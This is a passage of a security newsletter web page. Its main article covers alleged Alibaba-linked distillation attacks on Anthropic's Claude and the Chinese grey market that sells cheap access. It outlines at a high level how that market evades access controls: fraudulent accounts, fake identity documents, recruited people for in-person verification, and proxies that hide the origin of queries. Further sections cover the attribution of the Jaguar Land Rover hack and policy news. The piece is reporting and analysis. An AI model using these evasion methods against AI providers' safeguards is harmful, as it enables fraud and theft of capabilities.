href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: America won&apos;t beat the distillation ecosystem&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-f9964c89-9010-4b38-aaea-b0b85a1f1a8c.jpeg" class="kg-image" alt="Srsly Risky Biz: America Won&apos;t Beat the Distillation Ecosystem" loading="lazy" width="2000" height="1333" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/07/data-src-image-f9964c89-9010-4b38-aaea-b0b85a1f1a8c.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/07/data-src-image-f9964c89-9010-4b38-aaea-b0b85a1f1a8c.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/07/data-src-image-f9964c89-9010-4b38-aaea-b0b85a1f1a8c.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-f9964c89-9010-4b38-aaea-b0b85a1f1a8c.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Beijing Market, Photo by</span><a href="https://unsplash.com/@zhangkaiyv?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">zhang kaiyv</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/people-in-street-during-nighttime-eKbCGX6n554?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>Last week Anthropic accused Chinese company Alibaba of conducting what it described as the &quot;largest known distillation attack&quot; against the company&apos;s AI models.&#xA0;</p><p>Distillation attacks upskill less capable models by training them on the outputs of more advanced ones. Back in February <a href="https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"><u>Google</u></a>, <a href="https://assets.bwbx.io/documents/users/iqjWHBFdfxIU/rRmql_jJcxb4/v0"><u>OpenAI</u></a> and <a href="https://www.anthropic.com/news/detecting-and-preventing-distillation-attacks"><u>Anthropic</u></a> all said that Chinese companies were harvesting their proprietary intellectual property in coordinated campaigns.</p><p>Alibaba&apos;s latest campaign, <a href="https://www.reuters.com/world/china/anthropic-says-alibaba-illicitly-extracted-claude-ai-model-capabilities-2026-06-24/"><u>Anthropic says</u></a>, occurred from April 22 to June 5 and used more than 25,000 fraudulent accounts to generate 28.8 million exchanges. Anthropic says it was carried out by operators &quot;affiliated with Alibaba and Alibaba Qwen, Alibaba&apos;s AI lab&quot;.&#xA0;</p><p><a href="https://arstechnica.com/tech-policy/2026/06/anthropic-claims-alibaba-defied-trump-to-attack-claude-and-steal-capabilities/"><u>These claims</u></a> were detailed in a letter to US lawmakers which highlighted some of the impacts of the campaign. The letter said the attacks will help Chinese companies achieve advanced &quot;Mythos Preview-level&quot; cyber capabilities sooner, turn &quot;hundreds of billions of dollars in American investment and R&amp;D into a massive subsidy for our geopolitical competitors&quot; and help China&apos;s People&apos;s Liberation Army. It also described the campaign as &quot;brazen&quot;, occurring just weeks after White House committed to combatting the adversarial distillation of American AI models.&#xA0;&#xA0;</p><p>In April, when the US government said it would step up to counter distillation attacks, <a href="https://news.risky.biz/srsly-risky-biz-us-vows-to-fight-distillation-attacks/"><u>we were underwhelmed by the actions it proposed</u></a>. These included information sharing (yawn), facilitating the development of best practices to counter the attacks (double yawn), and &quot;explor[ing] a range of measures to hold foreign actors accountable for industrial-scale distillation campaigns&quot; (zzzzzz).&#xA0;</p><p>In hindsight, that last action is borderline funny. They&apos;re committing to <em>exploring</em> measures, but not actually taking them! Clearly these are high-agency people of action!&#xA0;</p><p>But avoiding a commitment to action here might be the safe bet. The distillation campaigns are just an offshoot of a complex greymarket economy that provides paying customers in mainland China with access to American AI services. Dismantling this whole ecosystem will be tough.&#xA0;</p><p>Zilan Qian has written a profile of this greymarket ecosystem <a href="https://www.chinatalk.media/p/how-to-buy-cheap-claude-tokens-in"><u>for the <em>ChinaTalk</em> substack</u></a>. In short, an entire supply chain of actors has sprung up to overcome barriers to access for Chinese people who are willing to pay for advanced American models. These barriers include geoblocking, phone verification, credit card requirements and live biometric know-your-customer checks.&#xA0;</p><p>A range of different providers register or acquire Anthropic accounts at scale, supply non-Chinese phone numbers for SMS verification, and provide payment infrastructure that lets Chinese customers pay for their tokens with local payment systems.&#xA0;&#xA0;</p><p>Because <a href="https://www.anthropic.com/news/updating-restrictions-of-sales-to-unsupported-regions"><u>Chinese users are banned</u></a> from using American AI services, middlemen in this ecosystem generate fake IDs to overcome know-your-customer requirements. If that fails, agents will even travel to low-income countries to recruit real individuals to complete in-person verification.&#xA0;</p><p>Then there are &quot;transfer stations&quot;, API proxies that sit between Chinese end-users and Anthropic&apos;s infrastructure. They&apos;re like <a href="https://openrouter.ai"><u>OpenRouter</u></a>, but designed to obfuscate the origin point of queries.&#xA0;</p><p>This entire ecosystem is financed by a whole range of users, not just AI companies looking to conduct distillation attacks. Users include university professors and students, tech workers, developers, resellers who buy wholesale access and repackage it for individual consumers, and even hobbyists.</p><p>Access to Claude via these means is amazingly <em>cheap, </em>too, with Chinese users paying as much as 70% to 90% below official prices. Transfer stations achieve a cost-advantage by, among other things, harvesting bulk registered free sign-up credits and even selling user logs of requests and responses to be used by Chinese model makers for distillation.&#xA0;</p><p>They&apos;ll also divvy up a Max plan&apos;s token quota amongst multiple users, or even just lie and short-change customers by charging for frontier models while actually routing requests to cheaper or open weights models.</p><p>The take home message here is that this is a sophisticated and profitable market and US government disruption efforts will have a limited impact.&#xA0;</p><p>Extreme solutions, like the <a href="https://www.politico.com/news/2026/06/30/anthropic-wh-lifting-export-limits-00980865"><u>now-abandoned export controls</u></a> on Anthropic&apos;s Mythos and Fable models, probably would have prevented Chinese distillation attacks, but only because they effectively prevented <em>everyone</em> from using the models.&#xA0;</p><p>With controls lifted, Fable is now broadly available, and our bet is that the Chinese AI access grey market is already working to get access for paying Chinese customers. The logs that will fuel distillation attacks are just a happy byproduct.</p><p>If the government imposes restrictions below the level of an outright ban, we expect market participants will be able to adjust. There is too much money to be made from AI right now, even in these strange, grey markets. The spice must flow!&#xA0;</p><p>In its letter to lawmakers, Anthropic suggested that the US should &quot;penalise bad behaviour&quot; from Chinese AI labs and notes that &quot;Alibaba is listed on the New York Stock Exchange, maintains business operations in the United States, and is accountable to US investors and regulators&quot;.&#xA0;</p><p>Direct action targeting specific companies <em>seems</em> more promising as a deterrent. But this kind of approach runs smack bang into bigger issues, like the entire bilateral trade relationship between the US and China. In mid-June <a href="https://www.reuters.com/world/china/us-holds-off-blacklisting-chinas-deepseek-more-than-100-firms-deemed-security-2026-06-17/"><u><em>Reuters</em> reported</u></a> that more than 100 Chinese companies, including AI firm DeepSeek, were slated to be placed on the Commerce Department&apos;s <a href="https://en.wikipedia.org/wiki/Entity_List"><u>Entity List</u></a>, a trade blacklist. The administration did not follow through in order to avoid escalating tensions with Beijing.&#xA0;</p><p>Unfortunately for American AI companies, the US government just doesn&apos;t have the leverage to materially affect the Chinese AI ecosystem, where logs are a wonderful byproduct that power distillation attacks.&#xA0;</p><p>Will the Trump administration risk damaging US-China relations to stop Chinese companies carrying out these attacks? Our magic 8 Ball says: Outlook not so good.</p><h2 id="jaguar-land-rover-hackers-were%E2%80%A6-russian">Jaguar Land Rover Hackers Were&#x2026; Russian!&#xA0;</h2><p>It turns out last year&apos;s extremely disruptive hack of Jaguar Land Rover (JLR) was the work of a Russian hacking group, at least according to a <em>New York Times </em>article<em> </em><a href="https://www.nytimes.com/2026/06/26/world/europe/jaguar-russia-hack.html?unlocked_article_code=1.tFA.x0BK.vfwe94C33Buu"><u>last week</u></a>. We&apos;re highly sceptical that it was directed by the Russian government, but it doesn&apos;t have to come from the top&#xA0; to cause pain to unfriendly states.&#xA0;</p><p>The JLR hack was a huge deal. It began on 31 August 2025 and resulted in the company&apos;s <a href="https://www.roverparts.com/roverlog-news-blog/all-jlr-factories-back-after-cyberattack/?srsltid=AfmBOort0qJ0OCGg7TMOMRndup12M5BvX7LesPyVNR3DW3Uwm4ZcH-OH"><u>production lines being shut</u></a> from September through until mid-October. It is the UK&apos;s largest ever hack in terms of financial impact, <a href="https://www.reuters.com/sustainability/boards-policy-regulation/jaguar-land-rover-hack-cost-uk-economy-25-billion-report-says-2025-10-22/"><u>estimated to have cost</u></a> the <a href="https://cybermonitoringcentre.com/2025/10/22/cyber-monitoring-centre-statement-on-the-jaguar-land-rovercyber-incident-october-2025/"><u>British economy &#xA3;1.9 billion</u></a> (USD$2.55 billion) and landed a <a href="https://www.theregister.com/security/2025/11/07/bank-of-england-says-jlrs-cyberattack-damaged-uk-gdp-growth/489387"><u>measurable impact</u></a> on the UK&apos;s economic growth.&#xA0;</p><p>At the time, a group calling itself the Scattered Lapsus$ Hunters claimed responsibility, going so far as to post proof by way of screenshots of internal JLR systems. The group&apos;s name is a play on three juvenile hacker collectives, so the logical presumption at the time was that a group of Western teenagers was responsible.</p><p>Now, however, the<em> New York Times</em> says this <em>wasn&#x2019;t</em> the work of wayward kids. According to five people familiar with an investigation into the hack it was, in fact, &quot;Russian hackers&quot;. <em>The Times</em> doesn&apos;t offer an opinion on whether Scattered Lapsus$ Hunters was <em>also</em> in JLR&apos;s systems at this time, or whether the purported group was a front for these Russian hackers.</p><p>Details about the attribution are thin, but include that &quot;the attack was different in methodology and motivation&quot; from typical Scattered Spider-style hacks. <em>The Times</em> says that Microsoft had already been tracking the Russian group when they hacked JLR. Shortly after the hack was detected, Microsoft advised the company that the Russian group was responsible.&#xA0;</p><p>The Times also reported the hackers apparently also used novel ransomware with a previously unseen encryption algorithm.</p><p>So far, so interesting, but then the<em> Times</em> plays up the possibility that the hack was directed by the Russian government. Its evidence? There was no ransom note, the attack took place &quot;amid an increasingly hostile relationship between Russia and Britain&quot; and the encryption algorithm used was sophisticated and unusual. One unnamed cyber security expert described it as &quot;really, really complicated&quot;.</p><p>We&apos;d be surprised if Russian state hackers were involved. They do have a war to worry about, after all. There is intelligence to collect and propaganda and cyber-enabled influence operations to run. There&apos;s just a lot on their plate.</p><p>There is a spectrum of possibilities here, though. At one end of the spectrum sits state-directed operations. At the other end of the spectrum are cyber criminals with no connection to the state whatsoever. In the middle, you have almost unlimited combinations and permutations of criminal and state involvement.</p><p>Criminals can be given &quot;top cover&quot; to operate freely as long as they make life painful for Russia&apos;s adversaries. They can be encouraged to attack industry sectors or economies the Kremlin wants to damage. They can even be tasked with disrupting a specific organisation.</p><p>We don&apos;t really know where this attack sits on that spectrum, and that&apos;s the entire point.&#xA0;</p><p>This is exactly <em>why</em> Russia is such an enjoyer of these types of grey-zone tactics. They sit below the threshold that warrants a big response, but still inflict real pain. Correctly attributing attacks like these is also a colossal pain in the neck.&#xA0;</p><p>So what <em>can</em> the UK government do about attacks like these? Not all that much! Russia is already sanctioned up the wazoo and is in the midst of a grinding war.</p><p>Given the absolute lack of downside for the Russians, we&apos;re frankly surprised we don&apos;t see more of this sort of thing.</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/Y5cZHTT_vpE?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: America won&apos;t beat the distillation ecosystem"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Access to Anthropic&apos;s Fable restored: </strong>Anthropic <a href="https://www.anthropic.com/news/redeploying-fable-5"><u>announced</u></a> on Tuesday that US government export controls on its Fable 5 and Mythos 5 models had been lifted and that customer access to the models will be restored. We hope that this is a step towards normalising the company&apos;s relationship with the government.&#xA0;&#xA0;</li><li><strong>Cellphone geolocation searches will need warrants: </strong>The US Supreme Court <a href="https://therecord.media/supreme-court-geofencing-ruling-fourth-amendment"><u>has ruled</u></a> that law enforcement agencies require a warrant when they ask companies to search their cellphone geolocation information. <a href="https://www.scotusblog.com/2026/06/court-rules-that-law-enforcements-use-of-geofence-warrant-was-a-search/"><u>A previous case</u></a> had ruled that a warrant <em>wasn&apos;t</em> needed, so we think this is a sensible correction. The court punted on what a reasonable and sufficiently tailored warrant would look like.</li><li><strong>US strikes scam compound cloud infrastructure:</strong> The US Department of Justice <a href="https://www.justice.gov/opa/pr/justice-department-seizes-backend-infrastructure-used-huione-group-money-laundering-services"><u>announced it had seized</u></a> cloud computing infrastructure used by the Huione Group, a Cambodia-based conglomerate involved in scam compounds and criminal marketplaces. The infrastructure was used by the group for money laundering, according to the DoJ. The Treasury also announced <a href="https://home.treasury.gov/news/press-releases/sb0538"><u>further sanctions</u></a> on the group.</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, James Wilson chats with Corelight&#x2019;s VP of Product Vijit Nair defence strategies for the AI era. When agents can find and exploit vulnerabilities at machine speed, you need to balance between proactive and reactive measures. On the proactive side, you need modelling of assets and threats. On the reactive side you&apos;ll need telemetry so you can act quickly if a threat becomes a reality.</em></p><p><em>Corelight makes NDR hardware that runs a heavily optimised version of the Zeek network monitoring tool. Combined with its Agentic Triage product, customers can detect threats in their networks, and monitor the effectiveness of their mitigation strategies.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI134.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI134/&quot;&gt;Sponsored: Corelight&#x2019;s blueprint for AI-era defence &lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 19:27 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Corelight&#x2019;s blueprint for AI-era defence &quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss whether cyber organisations should be separated from Signals Intelligence organisations.&#xA0;</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN172.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN172/&quot;&gt;Between Two Nerds: Set cyberspace ablaze&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; 